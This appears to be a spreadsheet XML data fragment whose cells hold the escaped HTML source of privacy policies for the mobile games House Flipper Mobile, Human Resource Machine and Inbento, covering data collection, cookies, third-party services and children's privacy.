    &lt;head&gt;
      &lt;meta charset='utf-8'&gt;
      &lt;meta name='viewport' content='width=device-width'&gt;
      &lt;title&gt;Privacy Policy&lt;/title&gt;
      &lt;style&gt; body { font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; padding:0 1em 1em 1em; } &lt;/style&gt;
    &lt;/head&gt;
    &lt;body&gt;
    &lt;h2&gt; Privacy Policy&lt;/h2&gt; &lt;p&gt; Imaginalis Games Sp. z o.o. is the creator of House Flipper Mobile app.</t>
  </si>
  <si>
    <t xml:space="preserve">This SERVICE is provided by
		Imaginalis Games Sp. z o.o. at no cost and is intended for use as is.
	   &lt;/p&gt; &lt;p&gt; This page is used to inform visitors regarding our policies with the collection, use, and disclosure
		of Personal Information if anyone decided to use our Service.
	  </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;If you choose to use our Service, then you agree to the collection and use of information in
		relation to this policy. The Personal Information that we collect is used for providing and improving
		the Service. We will not use or share your information with anyone except as described
		in this Privacy Policy.
	  </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Information Collection and Use&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;For a better experience, while using our Service, we store your device information and depending on which software functions you use we might also collect your:
		&lt;ul&gt;
		&lt;li&gt;Nickname&lt;/li&gt;
		&lt;li&gt;Basic location data&lt;/li&gt;
		&lt;li&gt;Account settings&lt;/li&gt;
		&lt;li&gt;Game progress&lt;/li&gt;
		&lt;/ul&gt;
	  &lt;/p&gt;
	  &lt;p&gt;If you create an account inside the game we might also store some additional data provided by third-party authentication services:
		&lt;ul&gt;
		&lt;li&gt;Profile picture (Facebook, Google Play Games)&lt;/li&gt;
		&lt;li&gt;Profile Id and E-mail address (Facebook) &lt;/li&gt;
		&lt;li&gt;Account settings&lt;/li&gt;
		&lt;li&gt;Game progress&lt;/li&gt;
		&lt;/ul&gt;
	  &lt;/p&gt;
	  &lt;p&gt; The app does use third party services that may collect information used to identify you.&lt;/p&gt; &lt;div&gt;&lt;p&gt;Link to privacy policy of third party service providers used by the app&lt;/p&gt;
		&lt;ul&gt;
			&lt;li&gt;&lt;a href="https://www.google.com/policies/privacy/" target="_blank"&gt;Google Play Services&lt;/a&gt;&lt;/li&gt;
			&lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="https://firebase.google.com/policies/analytics" target="_blank"&gt;Firebase Analytics&lt;/a&gt;&lt;/li&gt;
			&lt;li&gt;&lt;a href="https://www.facebook.com/about/privacy" target="_blank"&gt;Facebook&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		 &lt;/div&gt;
   	    &lt;p&gt;&lt;strong&gt;User Data Deletion&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;</t>
  </si>
  <si>
    <t>In case you would like to delete your Facebook user data collected and processed when using our Service, you can send us your Facebook user ID at: &lt;a href="mailto:houseflipper.imaginalis@gmail.com"&gt;houseflipper.imaginalis@gmail.com&lt;/a&gt;. Your data stored on our servers will be deleted and no longer used by our Service.&lt;/p&gt;
		&lt;p&gt;&lt;strong&gt;Log Data&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We want to inform you that whenever you use our Service, in a case of
		an error in the app we collect data and information (through third party products) on your phone
		called Log Data. This Log Data may include information such as your device Internet Protocol (“IP”) address,
		device name, operating system version, the configuration of the app when utilizing our Service,
		the time and date of your use of the Service, and other statistics.
	   &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Cookies and similar technologies&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Cookies are files with a small amount of data that are commonly used as anonymous unique identifiers.
		</t>
  </si>
  <si>
    <t>These are sent to your browser from the websites that you visit and are stored on your device's internal
		memory.
	   &lt;/p&gt; &lt;p&gt; This Service does not use these “cookies” explicitly.</t>
  </si>
  <si>
    <t>However, the app may use third party code and
		libraries that use “cookies” to collect information and improve their services. It includes usage of Android Advertising Identifier for Android or Advertising Identifier for iOS. You have the option to
		libraries that use “cookies” to collect information and improve their services.</t>
  </si>
  <si>
    <t xml:space="preserve">It includes usage of Android Advertising Identifier for Android or Advertising Identifier for iOS. You have the option to
		either accept or refuse these cookies and know when a cookie is being sent to your device. If you choose
		to refuse our cookies, you may not be able to use some portions of this Service.
	  </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Service Providers&lt;/strong&gt;&lt;/p&gt; &lt;p&gt; We may employ third-party companies and individuals due to the following reasons:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;To facilitate our Service;&lt;/li&gt; &lt;li&gt;To provide the Service on our behalf;&lt;/li&gt; &lt;li&gt;To perform Service-related services; or&lt;/li&gt; &lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt; We want to inform users of this Service that these third parties have access to
		your Personal Information.</t>
  </si>
  <si>
    <t>The reason is to perform the tasks assigned to them on our behalf. However,
		they are obligated not to disclose or use the information for any other purpose.
	   &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;</t>
  </si>
  <si>
    <t>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&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Links to Other Sites&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;</t>
  </si>
  <si>
    <t>This Service may contain links to other sites. If you click on a third-party link, you will be directed
		to that site. Note that these external sites are not operated by us.</t>
  </si>
  <si>
    <t>Therefore, we strongly
		advise you to review the Privacy Policy of these websites. We have no control over
		and assume no responsibility for the content, privacy policies, or practices of any third-party sites
		or services.
	   &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Children’s Privacy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We do not knowingly collect
		personally identifiable information from children under 13. In the case we discover that a child
		under 13 has provided us with personal information, we immediately delete this from
		our servers. If you are a parent or guardian and you are aware that your child has provided us with personal
		information, please contact us so that we will be able to do necessary actions.
	  </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Changes to This Privacy Policy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt; We may update our Privacy Policy from time to time.</t>
  </si>
  <si>
    <t xml:space="preserve">Thus, you are advised to review
		this page periodically for any changes. We will notify you of any changes by posting
		the new Privacy Policy on this page. These changes are effective immediately after they are posted on
		this page.
	  </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Contact Us&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;If you have any questions or suggestions about our Privacy Policy, do not hesitate to contact
		us.
	   &lt;/p&gt;
    &lt;/body&gt;
    &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;_x005F_x000D_
&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"&gt;_x005F_x000D_
_x005F_x000D_
&lt;head profile="http://gmpg.org/xfn/11"&gt;_x005F_x000D_
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;_x005F_x000D_
_x005F_x000D_
&lt;meta name="description" content="Tomorrow Corporation is an independent game developer behind indie games Little Inferno and Human Resource Machine" /&gt;_x005F_x000D_
_x005F_x000D_
&lt;title&gt;Tomorrow Corporation  :  Human Resource Machine Privacy&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
&lt;link rel="shortcut icon" href="http://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/favicon.ico" /&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="http://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/style.css" type="text/css" media="screen" /&gt;_x005F_x000D_
&lt;link rel="pingback" href="http://tomorrowcorporation.com/blog/xmlrpc.php" /&gt;_x005F_x000D_
&lt;link rel="alternate" type="application/rss+xml" title="Tomorrow Corporation RSS Feed" href="https://tomorrowcorporation.com/feed" /&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- begin wp_head() --&gt;_x005F_x000D_
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;script type="text/javascript"&gt;
</t>
  </si>
  <si>
    <t>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/tomorrowcorporation.com\/blog\/wp-includes\/js\/wp-emoji-release.min.js?ver=b1eb42474d09240aa08579e0bb84f505"}};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t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='http://tomorrowcorporation.com/blog/wp-includes/css/dist/block-library/style.min.css?ver=b1eb42474d09240aa08579e0bb84f505' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='http://tomorrowcorporation.com/blog/wp-includes/css/classic-themes.min.css?ver=b1eb42474d09240aa08579e0bb84f505'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 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined:</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel="https://api.w.org/" href="https://tomorrowcorporation.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://tomorrowcorporation.com/wp-json/wp/v2/pages/2020" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://tomorrowcorporation.com/blog/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tomorrowcorporation.com/blog/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel="canonical" href="https://tomorrowcorporation.com/human-resource-machine-privacy" /&gt;
&lt;link rel='shortlink' href='https://tomorrowcorporation.com/?p=2020' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://tomorrowcorporation.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftomorrowcorporation.com%2Fhuman-resource-machine-privacy" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://tomorrowcorporation.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftomorrowcorporation.com%2Fhuman-resource-machine-privacy&amp;#038;format=xml" /&gt;
&lt;!-- end wp_head() --&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
&lt;body class="page-template-default page page-id-2020"&gt;_x005F_x000D_
 _ x000D_
&lt;div id="page"&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- tomorrow corporation!!!!</t>
  </si>
  <si>
    <t>and menu stuff --&gt;_x005F_x000D_
&lt;div id="head"&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!-- top image --&gt;_x005F_x000D_
	&lt;div style="margin:0px;	padding:0px; border:0px;"&gt;&lt;a href="/" &gt;&lt;img width="1000" height="268" src="http://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_head.jpg" alt="Tomorrow Corporation: Indie Game Developer, Kyle Gabler, Kyle Gray, Allan Blomquist, Little Inferno, Human Resource Machine"&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!-- nav menu --&gt;_x005F_x000D_
	&lt;div id="navmenu"&gt;_x005F_x000D_
		&lt;img width="379" height="81" src="http://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_navmenu_left.jpg" &gt;_x005F_x000D_
		&lt;a id="navmenu_RSS" href="/feed" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;a id="navmenu_BLOG" href="/" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;a id="navmenu_GAMES" href="/games" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;a id="navmenu_ABOUT" href="/about" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;img width="205" height="81" src="http://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_navmenu_right.jpg" &gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!-- the little strip below the menu --&gt;_x005F_x000D_
	&lt;div style="margin:0px;	padding:0px; border: 0px;"&gt;_x005F_x000D_
		&lt;img src="http://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_contenthead.jpg" &gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;div id="torso"&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- begin main page --&gt;_x005F_x000D_
&lt;div id="content" class="contentcolumn" role="main"&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>our games nav --&gt;_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
		_x005F_x000D_
		&lt;div class="entryBegin"&gt;&lt;/div&gt;_x005F_x000D_
		&lt;div class="entryMain" id="post-2020"&gt;_x005F_x000D_
_x005F_x000D_
		_x005F_x000D_
			&lt;div class="entry"&gt;_x005F_x000D_
			_x005F_x000D_
									&lt;h2&gt;&lt;strong&gt; Important Privacy Policies&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;Human Resource Machine&lt;/h3&gt;
&lt;p&gt;Human Resource Machine collects absolutely no information about players, and never will.&lt;/p&gt;
								_x005F_x000D_
				&lt;div&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
				_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		&lt;div class="entryEnd"&gt;&lt;/div&gt;_x005F_x000D_
	_x005F_x000D_
		_x005F_x000D_
_x005F_x000D_
&lt;/div&gt;	&lt;!-- end content div started in header --&gt;
&lt;div class="clear"&gt;&lt;/div&gt;
&lt;/div&gt;	&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">end "torso" --&gt;
&lt;div id="footer"&gt;
	&lt;img src="http://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_foot.jpg" /&gt;
&lt;/div&gt;
&lt;/div&gt;	&lt;!-- end "page" --&gt;
&lt;script type='text/javascript' src='http://tomorrowcorporation.com/blog/wp-includes/js/comment-reply.min.js?ver=b1eb42474d09240aa08579e0bb84f505' id='comment-reply-js'&gt;&lt;/script&gt;
&lt;div style="color:#888888; background-color:#2b2b2b; text-align:center; padding:8px; font-size:12px;"&gt;
&lt;a href="/feed"&gt;subscribe to the rss feed&lt;/a&gt;
|
&lt;a href="/"&gt;blog&lt;/a&gt;
|
&lt;a href="/games"&gt;our games&lt;/a&gt;
|
&lt;a href="/about"&gt;about Tomorrow Corporation&lt;/a&gt;
|
&lt;a href="/important-privacy-policy"&gt;privacy policy&lt;/a&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;title&gt;Privacy Policy for Inbento - FreePrivacyPolicy.com&lt;/title&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="stylesheet" type="text/css" href="/public/livelink/css/livelink.css" /&gt;
&lt;meta name="robots" content="noindex" /&gt;
&lt;meta property="og:title" content="Privacy Policy for Inbento - FreePrivacyPolicy.com" /&gt;
&lt;meta property="og:image" content="https://www.freeprivacypolicy.com/public/images/meta_og_image_livelink.png" /&gt;
&lt;meta property="og:image:width" content="1280" /&gt;
&lt;meta property="og:image:height" content="720" /&gt;
&lt;meta property="og:url" content="https://www.freeprivacypolicy.com/live/8caefbf209befa2bf055cef56dc2c2a7" /&gt;
&lt;meta property="og:site_name" content="FreePrivacyPolicy.com" /&gt;
&lt;link rel="canonical" href="https://www.freeprivacypolicy.com/live/8caefbf209befa2bf055cef56dc2c2a7" /&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-QSMNQ8CKJG"&gt;&lt;/script&gt;
&lt;script&gt;
     window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'G-QSMNQ8CKJG');
    &lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="page"&gt;
&lt;div class="header"&gt;
&lt;div class="container"&gt;
&lt;p class="title"&gt;Privacy Policy for Inbento&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="translations-list-container"&gt;
&lt;div class="container"&gt;
&lt;ul class="translations-list"&gt;
&lt;li class="en translations-list-item"&gt;
&lt;a class="tab-link active" href="#en"&gt;English&lt;/a&gt;
&lt;/li&gt;
&lt;li class="it translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#it"&gt;Italian&lt;/a&gt;
&lt;/li&gt;
&lt;li class="de translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#de"&gt;German&lt;/a&gt;
&lt;/li&gt;
&lt;li class="nl translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#nl"&gt;Dutch&lt;/a&gt;
&lt;/li&gt;
&lt;li class="fr translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#fr"&gt;French&lt;/a&gt;
&lt;/li&gt;
&lt;li class="es translations-list-item"&gt;
&lt;a class="tab-link inactive" href="#es"&gt;Spanish&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="translations-content-container"&gt;
&lt;div class="container"&gt;
&lt;div class="tab-content translations-content-item en visible" id="en"&gt;
&lt;h1&gt;Privacy Policy&lt;/h1&gt;
&lt;p&gt;Effective date: July 01, 2019&lt;/p&gt;
&lt;p&gt;Inbento (&amp;quot;us&amp;quot;, &amp;quot;we&amp;quot;, or &amp;quot;our&amp;quot;) operates the Inbento mobile application (hereinafter referred to as the &amp;quot;Service&amp;quot;).&lt;/p&gt;
&lt;p&gt; This page informs you of our policies regarding the collection, use and disclosure of personal data when you use our Service and the choices you have associated with that data. This Privacy Policy is managed by &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use your data to provide and improve the Service. By using the Service, you agree to the collection and use of information in accordance with this policy. Unless otherwise defined in this Privacy Policy, the terms used in this Privacy Policy have the same meanings as in our Terms and Conditions.&lt;/p&gt;
&lt;h2&gt;Definitions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Service&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Service is the Inbento mobile application operated by Inbento&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Personal Data&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Personal Data means data about a living individual who can be identified from those data (or from those and other information either in our possession or likely to come into our possession).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Usage Data&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Usage Data is data collected automatically either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cookies are small files stored on your device (computer or mobile device).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Information Collection and Use&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use Security Cookies for security purposes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Use of Data&lt;/h2&gt;
&lt;p&gt;Inbento uses the collected data for various purposes:&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;To provide and maintain our Service&lt;/li&gt;
&lt;li&gt;To notify you about changes to our Service&lt;/li&gt;
&lt;li&gt;To allow you to participate in interactive features of our Service when you choose to do so&lt;/li&gt;
&lt;li&gt;To provide customer support&lt;/li&gt;
&lt;li&gt;To gather analysis or valuable information so that we can improve our Service&lt;/li&gt;
&lt;li&gt;To monitor the usage of our Service&lt;/li&gt;
&lt;li&gt;To detect, prevent and address technical issues&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Transfer of Data&lt;/h2&gt;
&lt;p&gt;Your information, including Personal Data, may be transferred to - and maintained on - computers located outside of your state, province, country or other governmental jurisdiction where the data protection laws may differ from those of your jurisdiction.&lt;/p&gt;
&lt;p&gt;If you are located outside and choose to provide information to us, please note that we transfer the data, including Personal Data, to and process it there.&lt;/p&gt;
&lt;p&gt;Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.&lt;/p&gt;
&lt;p&gt;Inbento will take all the steps reasonably necessary to ensure that your data is treated securely and in accordance with this Privacy Policy and no transfer of your Personal Data will take place to an organisation or a country unless there are adequate controls in place including the security of your data and other personal information.&lt;/p&gt;
&lt;h2&gt;Disclosure of Data&lt;/h2&gt;
&lt;h3&gt;Legal Requirements&lt;/h3&gt;
&lt;p&gt;Inbento may disclose your Personal Data in the good faith belief that such action is necessary to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;To comply with a legal obligation&lt;/li&gt;
&lt;li&gt;To protect and defend the rights or property of Inbento&lt;/li&gt;
&lt;li&gt;To prevent or investigate possible wrongdoing in connection with the Service&lt;/li&gt;
&lt;li&gt;To protect the personal safety of users of the Service or the public&lt;/li&gt;
&lt;li&gt;To protect against legal liability&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Security of Data&lt;/h2&gt;
&lt;p&gt; The security of your data is important to us but remember that no method of transmission over the Internet or method of electronic storage is 100% secure.</t>
  </si>
  <si>
    <t>These third parties have access to your Personal Data only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.&lt;/p&gt;
&lt;h2&gt;Links to Other Sites&lt;/h2&gt;
&lt;p&gt; Our Service may contain links to other sites that are not operated by us. If you click a third party link, you will be directed to that third party's site.</t>
  </si>
  <si>
    <t>We strongly advise you to review the Privacy Policy of every site you visit.
 We have no control over and assume no responsibility for the content, privacy policies or practices of any third party sites or services.&lt;/p&gt;
&lt;h2&gt; Children's Privacy&lt;/h2&gt;
&lt;p&gt;Our Service does not address anyone under the age of 18 (&amp;quot;Children&amp;quot;).&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We do not knowingly collect personally identifiable information from anyone under the age of 18. If you are a parent or guardian and you are aware that your Child has provided us with Personal Data, please contact us. If we become aware that we have collected Personal Data from children without verification of parental consent, we take steps to remove that information from our servers.&lt;/p&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Changes to This Privacy Policy&lt;/h2&gt;
&lt;p&gt; We may update our Privacy Policy from time to time. We will notify you of any changes by posting the new Privacy Policy on this page.
</t>
  </si>
  <si>
    <t>We will let you know via email and/or a prominent notice on our Service, prior to the change becoming effective and update the &amp;quot;effective date&amp;quot; at the top of this Privacy Policy.&lt;/p&gt;
&lt;p&gt; You are advised to review this Privacy Policy periodically for any changes. Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h2&gt;Contact Us&lt;/h2&gt;
&lt;p&gt;If you have any questions about this Privacy Policy, please contact us:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;By email: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="eb8285898e859f84ab8a8d9f8e99899e9985c58c8a868e98"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="tab-content translations-content-item it hidden" id="it"&gt;
&lt;h1&gt;Informativa sulla Privacy&lt;/h1&gt;
&lt;p&gt;Data di entrata in vigore:</t>
  </si>
  <si>
    <t>July 01, 2019&lt;/p&gt;
&lt;p&gt;Inbento (&amp;quot;noi&amp;quot; o &amp;quot;nostro&amp;quot;) gestisce il Inbento l'applicazione per dispositivi mobili (in appresso il &amp;quot;Servizio&amp;quot;).&lt;/p&gt;
&lt;p&gt;Questa pagina vi informa delle nostre politiche riguardanti la raccolta, l'uso e la divulgazione dei dati personali quando usate il nostro Servizio e le scelte che avete associato a quei dati. Questa Informativa sulla privacy è gestita da &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Utilizziamo i vostri dati per fornire e migliorare il Servizio.</t>
  </si>
  <si>
    <t>Utilizzando il Servizio, accettate la raccolta e l'utilizzo delle informazioni in conformità con questa informativa. Se non diversamente definito nella presente Informativa sulla privacy, i termini utilizzati nella presente Informativa hanno la stessa valenza dei nostri Termini e condizioni.&lt;/p&gt;
&lt;h2&gt;Definizioni&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Servizio&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Il Servizio è l'applicazione per dispositivi mobili Inbento gestita dalla Inbento&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Dati personali&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I Dati personali sono i dati di un individuo vivente che può essere identificato da quei dati (o da quelli e altre informazioni in nostro possesso o che potrebbero venire in nostro possesso).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Dati di utilizzo&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I dati di utilizzo sono i dati raccolti automaticamente generati dall'utilizzo del Servizio o dall'infrastruttura del Servizio stesso (ad esempio, la durata della visita di una pagina).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I cookie sono piccoli file memorizzati sul vostro dispositivo (computer o dispositivo mobile).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Raccolta e uso delle informazioni&lt;/h2&gt;
&lt;p&gt;Raccogliamo diversi tipi di informazioni per vari scopi, per fornire e migliorare il nostro servizio.&lt;/p&gt;
&lt;h3&gt;Tipologie di Dati raccolti&lt;/h3&gt;
&lt;h4&gt;Dati personali&lt;/h4&gt;
&lt;p&gt;Durante l'utilizzo del nostro Servizio, potremmo chiedervi di fornirci alcune informazioni di identificazione personale che possono essere utilizzate per contattarvi o identificarvi (&amp;quot;Dati personali&amp;quot;).</t>
  </si>
  <si>
    <t xml:space="preserve">Le informazioni di identificazione personale possono includere, ma non sono limitate a:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cookie e dati di utilizzo&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Dati di utilizzo&lt;/h4&gt;
&lt;p&gt;Quando si accede al Servizio attraverso un dispositivo mobile, potremmo raccogliere automaticamente alcune informazioni, inclusi, ma non solo, il tipo di dispositivo mobile che si utilizza, l'ID univoco del dispositivo mobile, l'indirizzo IP del dispositivo mobile, il sistema operativo mobile, il tipo di browser Internet mobile che utilizzate, identificatori di dispositivo univoci e altri dati diagnostici (&amp;quot;Dati di utilizzo&amp;quot;).&lt;/p&gt;
&lt;h4&gt;Tracciamento; dati dei cookie&lt;/h4&gt;
&lt;p&gt;Utilizziamo cookie e tecnologie di tracciamento simili per tracciare l'attività sul nostro Servizio e conservare determinate informazioni.&lt;/p&gt;
&lt;p&gt;I cookie sono file con una piccola quantità di dati che possono includere un identificatore univoco anonimo. I cookie vengono inviati al vostro browser da un sito web e memorizzati sul vostro dispositivo. Altre tecnologie di tracciamento utilizzate sono anche beacon, tag e script per raccogliere e tenere traccia delle informazioni e per migliorare e analizzare il nostro Servizio.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;Potete chiedere al vostro browser di rifiutare tutti i cookie o di indicare quando viene inviato un cookie. Tuttavia, se non si accettano i cookie, potrebbe non essere possibile utilizzare alcune parti del nostro Servizio.&lt;/p&gt;
&lt;p&gt;Esempi di cookie che utilizziamo:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt; Cookie di sessione.&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Utilizziamo i cookie di sessione per gestire il nostro servizio.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Cookie di preferenza.&lt;/strong&gt; Utilizziamo i cookie di preferenza per ricordare le vostre preferenze e varie impostazioni.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cookie di sicurezza.&lt;/strong&gt; Utilizziamo i cookie di sicurezza per motivi di sicurezza.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Uso dei dati&lt;/h2&gt;
